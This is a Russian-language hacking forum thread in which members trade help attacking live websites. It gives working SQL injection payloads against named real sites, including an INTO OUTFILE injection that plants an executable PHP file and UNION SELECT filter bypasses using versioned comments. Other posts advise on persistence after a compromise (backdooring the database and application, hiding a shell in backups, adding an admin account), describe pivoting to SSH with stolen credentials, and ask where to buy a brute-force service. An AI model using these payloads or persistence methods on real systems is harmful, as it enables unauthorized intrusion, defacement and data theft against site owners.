Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Никак. Версия получается использованием условных комментариев:
    Code:
    /*!50610 test*/
    /*!50611 test*/
    
     
  2. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    то есть никак не раскрутить пример?
     
  3. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Сегодняшними методами - нет. Здесь PDO_MYSQL, возможно удастся использовать именно это.
     
  4. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    158
    Likes Received:
    37
    Reputations:
    2
    http://www.exploit-db.com/exploits/34025/
     
  5. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Вы про одно забыли - файловые права :)
    Code:
    http://press.otherimages.com/search/text/cat:CEL?pag=1&display=1 into outfile "C:\\\\WEB\\\\UBUNTU\\\\OTHERIMAGESPRESS\\\\controller\\\\123.php" lines terminated by "111"
    http://press.otherimages.com/controller/i.php?inoms=phpinfo%28%29;
     
    2 people like this.
  6. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Помогите обойти фильтр
    Code:
    http://www.mak-unatrac.com/index.php?pg=product_details&product_id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9+--+
     
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    _ttp://www.mak-unatrac.com/index.php?pg=product_details&product_id=2%0B/*!12345%75NiON*/%0B/*!12345%73ElECT*/%0B1,version%28%29,3,4,5,6,7,8,9+--+

    5.1.72-cll

    P.S: Вариант с JOIN'ом))

     
    _________________________
    #23367 winstrool, 15 Jul 2014
    Last edited: 15 Jul 2014
    2 people like this.
  8. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Предложу еще свой вариант:

    + так же с join проходит
     
    #23368 YaBtr, 15 Jul 2014
    Last edited: 15 Jul 2014
  9. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    YaBtr, В твоем варианте нельзя использовать FROM (срабатывает WAF). У winstrool отлично получилось склеить цифры с union. Можно упростить:
    PHP:
    /*!12345union*/ select 1,user(),3,4,5,6,7,8,9--
     
    #23369 randman, 15 Jul 2014
    Last edited: 15 Jul 2014
    1 person likes this.
  10. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Есть сайт http://site.com
    Есть шелл на этом сайте и возможность получить root-а

    Вопрос: как закрепится в системе, если раз в 24 часа происходит откат всех файлов из бекапа?

    Вариант с подменой архива с бекапом - не вариант.
    Mysql вертится на другом сервере.
     
    #23370 Aniweste, 16 Jul 2014
    Last edited: 16 Jul 2014
  11. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173

    а тебе mysql не нужен для подмены бекапа, ты подменяешь файлы, а не БД, следовательно суёшь шелл в бекап.

    да и вообще если уже ты рут, то добавь второго админа или тупо выключи откат.
     
    #23371 OxoTnik, 16 Jul 2014
    Last edited: 16 Jul 2014
  12. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    забэкдурь и БД и двиг.
    http://raz0r.name/obzory/mysql-bekdor-dlya-windows/ для венды от Разора (старье но временами работает)
    https://rdot.org/forum/showthread.php?t=677 отличный вариант от Типсей
     
    _________________________
    #23372 shell_c0de, 17 Jul 2014
    Last edited: 17 Jul 2014
  13. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Тут вопрос в том, что вы имеете под "всех". Если вообще все файлы, то тут только атака на сервер с бекапами. Если все-таки не совсем все, то троянить надо то, что не переписывается. Также есть вариант с захватом всех возможных паролей и ключей.
     
    1 person likes this.
  14. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Спасибо, что натолкнул на вариант с паролями - нашёл файлик с доступами :)



    Теперь довольно глупый вопрос, на который я не могу найти ответ:
    1. Имеется доступ к сайту через форум phpbb.
    2. Имеется шелл к данному сайту, залитый через изменение шаблона.


    Теперь суть проблемы - при бекконекте к сайту для последующей заливки шелла меняется пользователь.

    Т.е.
    При редактировании шаблона - есть возможность редактировать все файлы шаблона. Для редактирования этих файлов используется учётная запись на сервере User1

    Но в случае, если напрямую из изменённого файла шаблона выполнить whoami (или сделать бекконект и залить файл в одну из доступных папок), то получаем ответ на whoami - User. У которого есть права на чтение всех папок, кроме двух + есть возможность чтения почти всех файлов.


    Теперь вопрос:
    Учитывая возможности phpbb (3.0.22) - есть ли возможность загрузить файл так, чтобы владелец этого файла был User1.
     
  15. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Насколько я помню, в пхпбб нет способа отражения текущего юзера. Энивей, тут также возможны несколько вариантов:
    1) Наследственные права, когда все файлы в директории получают владельцем владельца директории.
    2) Хитросплетения веб-демонов, изоляций и прочих некошерных вещей.
    3) Юзер таки один.

    Это что касается возможных причин. Попробуйте не аплоадить новый файл тем или иным способом, а вписать текст шелла в один из уже имеющихся.
     
  16. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Каким-то непонятным образом нашёл файл text.py в котором были данные для входа для пользователя sara.

    Доступ оказался доступом по SSH
    Зашёл и обнаружил проблему -
    Из под шелла (пользователь user1):
    cd home
    ls -la
    5 папок с датой за июль

    А из под SSH (пользователь sara):
    cd home
    ls -la

    3 папки с датой за июнь


    Пытался редактировать файл из под sara - всё редактируется, но при заходе из под шелла - никаких изменений не видно.

    Теперь вопрос - почему так? Почему разные даты и разное количество папок? :mad:
    Вывод id

    user1:
    uid=510(user1) gid=500(user) groups=500(user)

    user:
    uid=500(user) gid=500(user) groups=500(user)

    sara:
    uid=501(sara) gid=501(sara) groups=501(sara),4(adm),10(wheel),500(user)
     
    #23376 Aniweste, 19 Jul 2014
    Last edited: 20 Jul 2014
  17. faysto

    faysto New Member

    Joined:
    27 May 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    у кого заказать брутфорс xenforto или мыльника?
     
  18. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    у васи из 8Б
     
  19. Грабитель

    Joined:
    5 Mar 2013
    Messages:
    196
    Likes Received:
    12
    Reputations:
    -7
    Есть ли возможность обойти фильтрацию запятой в SQL иньекции?

    к примеру запрос: script.php?id=22+union+select+1,2,3+--+
    Запятые нужны, комментарии /!*,*/ не прокатывают, запятые останавливают SQL запрос.
    Есть возможность крутить SQL как error-based, но все паблик способы раскрутки опять же требуют наличие запятых.
    Кто подскажет, буду признателен. Благодарю за внимание.
     
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Хм?

    (select 1)a join (select 2)b ?
     
    _________________________
Thread Status:
Not open for further replies.